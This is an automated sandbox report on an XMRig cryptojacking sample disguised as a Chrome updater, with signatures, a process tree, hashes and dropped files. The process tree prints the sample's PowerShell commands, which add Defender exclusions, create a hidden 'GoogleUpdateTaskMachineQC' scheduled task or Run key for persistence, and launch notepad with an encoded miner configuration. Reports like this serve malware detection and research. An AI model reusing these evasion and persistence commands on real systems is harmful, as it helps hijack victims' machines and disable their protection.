Analysis
-
max time kernel
210s -
max time network
207s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
28-03-2023 09:05
General
-
Target
SockaBlet.exe
-
Size
2.0MB
-
MD5
9c84a7a992b37ae6ad3f39b8435f953c
-
SHA1
81c0475316d118665983b78eb7b85599fae61138
-
SHA256
4e5fbc23bbecadfc537e5f3b83d12331052289364be3b2116a1dbd0296097354
-
SHA512
d9ed4faf75450a500945a8f7de03e6086cffb2f780fc7e4bb83e40301718c8aebdd74b07fb41a1dac9165f15e7b4e02aef68312e52b9dd8f238457f4f899578d
-
SSDEEP
49152:EMTGvc8bU8qOJFBfqK/tuZmsXz08r+gNZTruavlOpb:EMacQVtFPOmuA8HNZTKCOp
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 18 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
UPX packed file 18 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\SockaBlet.exe"C:\Users\Admin\AppData\Local\Temp\SockaBlet.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lcyitm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mwzfmvpg#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lcyitm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe jyfvlzyvjtyyzdb2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe kxbznjupmywwxqtm 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvsjpN5Mqdy4DBfa6KATFfaK7PN8mix6MMV4iGHNORhFa56SHcZDeCW1Lsov71dhdQbkXuUv9ftk11ZvDqqAQvZCLFfwdNs/aL+K3Pw4W2/Zq7N1D+h2sxg3TiHZeO1pQ+VhAEqfsJzMxttgvg82q1nelXnau3b1wD0AB1GS81hqYkfF9Ffcz3HVCMMF8vA0Z/t9gPEtSvxVdVLEuEiYFjFc0MfHMAYC1iYIy/jkt+fzZnPwDHv6S9aNk+sLVoNsUdmbLDx07OdFlugfJNkLV2xNXdFezuST7/GnUEiVYjRXC2eButxvL/AnR9+l57TO/Hh2uNijfqioGCXa9sh1+qRF/+r+TmcgTfhKT2Am1vIg5MUXERpg3zH2ngJNzTTFrpoZ2f8kV/NMxL5HU4QM39jdbtLnLDFYVepzxgT91Nu3yrbnx7Me33tw3nDJgk2evr7II5XeX3MrzFO7VnNAw9Zc8djcpYNzdNgG3DOLiEhiX75KMZHCnwhoeposcvhYluU=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {4998DE63-679E-4F5E-89A1-718FDB98E2A9} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4101⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.0MB
MD59c84a7a992b37ae6ad3f39b8435f953c
SHA181c0475316d118665983b78eb7b85599fae61138
SHA2564e5fbc23bbecadfc537e5f3b83d12331052289364be3b2116a1dbd0296097354
SHA512d9ed4faf75450a500945a8f7de03e6086cffb2f780fc7e4bb83e40301718c8aebdd74b07fb41a1dac9165f15e7b4e02aef68312e52b9dd8f238457f4f899578d
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.0MB
MD59c84a7a992b37ae6ad3f39b8435f953c
SHA181c0475316d118665983b78eb7b85599fae61138
SHA2564e5fbc23bbecadfc537e5f3b83d12331052289364be3b2116a1dbd0296097354
SHA512d9ed4faf75450a500945a8f7de03e6086cffb2f780fc7e4bb83e40301718c8aebdd74b07fb41a1dac9165f15e7b4e02aef68312e52b9dd8f238457f4f899578d
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5f09ab4c60d816c64ad837d256f37bd64
SHA158d6f0bb39f1e8401390b3f28b3338ce5bbcaa57
SHA256e2f49adc7ad4c15501af52789902bc59e08ee206344ef88625a38656f22636d9
SHA512cf893d5ca11d7d506037015b3c5bfca8bdb851106ca7cc816d17c2f875d121dbd3da54b3c2c6528322c781500c0e3de2e297b91027c41bf46d5e2c1dbaf8f881
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5f09ab4c60d816c64ad837d256f37bd64
SHA158d6f0bb39f1e8401390b3f28b3338ce5bbcaa57
SHA256e2f49adc7ad4c15501af52789902bc59e08ee206344ef88625a38656f22636d9
SHA512cf893d5ca11d7d506037015b3c5bfca8bdb851106ca7cc816d17c2f875d121dbd3da54b3c2c6528322c781500c0e3de2e297b91027c41bf46d5e2c1dbaf8f881
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WI1OQYD1ETSPQYE1W90B.tempFilesize
7KB
MD5f09ab4c60d816c64ad837d256f37bd64
SHA158d6f0bb39f1e8401390b3f28b3338ce5bbcaa57
SHA256e2f49adc7ad4c15501af52789902bc59e08ee206344ef88625a38656f22636d9
SHA512cf893d5ca11d7d506037015b3c5bfca8bdb851106ca7cc816d17c2f875d121dbd3da54b3c2c6528322c781500c0e3de2e297b91027c41bf46d5e2c1dbaf8f881
-
C:\Windows\System32\drivers\etc\hostsFilesize
1KB
MD52153b388ef2cb7d1e612053e5425219b
SHA110e344c1f59ab50497bc2632df18140062c8fa14
SHA25696ba53f24688edb967374498837066b31c9763a201290af9f4f56d47c05e0d70
SHA512227ea8e5cd79bfc7a032d2d9f5c0115c300702024e60a70a5af48540e8ae44d9e9a9ef368c3588d6cbae5d43ee7e113665c99c6d75620a3e8f872919f5391564
-
\Program Files\Google\Chrome\updater.exeFilesize
2.0MB
MD59c84a7a992b37ae6ad3f39b8435f953c
SHA181c0475316d118665983b78eb7b85599fae61138
SHA2564e5fbc23bbecadfc537e5f3b83d12331052289364be3b2116a1dbd0296097354
SHA512d9ed4faf75450a500945a8f7de03e6086cffb2f780fc7e4bb83e40301718c8aebdd74b07fb41a1dac9165f15e7b4e02aef68312e52b9dd8f238457f4f899578d
-
memory/268-76-0x00000000024F0000-0x0000000002570000-memory.dmpFilesize
512KB
-
memory/268-72-0x0000000001D30000-0x0000000001D38000-memory.dmpFilesize
32KB
-
memory/268-73-0x00000000024F0000-0x0000000002570000-memory.dmpFilesize
512KB
-
memory/268-74-0x00000000024F0000-0x0000000002570000-memory.dmpFilesize
512KB
-
memory/268-75-0x00000000024F0000-0x0000000002570000-memory.dmpFilesize
512KB
-
memory/268-71-0x000000001B1C0000-0x000000001B4A2000-memory.dmpFilesize
2.9MB
-
memory/756-61-0x0000000002500000-0x0000000002580000-memory.dmpFilesize
512KB
-
memory/756-64-0x000000000250B000-0x0000000002542000-memory.dmpFilesize
220KB
-
memory/756-59-0x000000001AF40000-0x000000001B222000-memory.dmpFilesize
2.9MB
-
memory/756-62-0x0000000002500000-0x0000000002580000-memory.dmpFilesize
512KB
-
memory/756-60-0x00000000023A0000-0x00000000023A8000-memory.dmpFilesize
32KB
-
memory/756-63-0x0000000002500000-0x0000000002580000-memory.dmpFilesize
512KB
-
memory/880-114-0x0000000140000000-0x0000000140016000-memory.dmpFilesize
88KB
-
memory/880-107-0x0000000140000000-0x0000000140016000-memory.dmpFilesize
88KB
-
memory/1084-90-0x0000000001104000-0x0000000001107000-memory.dmpFilesize
12KB
-
memory/1084-91-0x000000000110B000-0x0000000001142000-memory.dmpFilesize
220KB
-
memory/1096-54-0x000000013F230000-0x000000013F441000-memory.dmpFilesize
2.1MB
-
memory/1096-78-0x000000013F230000-0x000000013F441000-memory.dmpFilesize
2.1MB
-
memory/1108-89-0x000000013F300000-0x000000013F511000-memory.dmpFilesize
2.1MB
-
memory/1108-104-0x000000013F300000-0x000000013F511000-memory.dmpFilesize
2.1MB
-
memory/1160-113-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-117-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-139-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-137-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-105-0x0000000000150000-0x0000000000170000-memory.dmpFilesize
128KB
-
memory/1160-106-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-135-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-108-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-109-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-111-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-133-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-131-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-115-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-129-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-119-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-121-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-123-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-125-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1160-127-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1732-84-0x00000000026F4000-0x00000000026F7000-memory.dmpFilesize
12KB
-
memory/1732-85-0x00000000026FB000-0x0000000002732000-memory.dmpFilesize
220KB
-
memory/1944-97-0x000000000088B000-0x00000000008C2000-memory.dmpFilesize
220KB
-
memory/1944-94-0x0000000000880000-0x0000000000900000-memory.dmpFilesize
512KB
-
memory/1944-96-0x0000000000880000-0x0000000000900000-memory.dmpFilesize
512KB
-
memory/1944-95-0x0000000000880000-0x0000000000900000-memory.dmpFilesize
512KB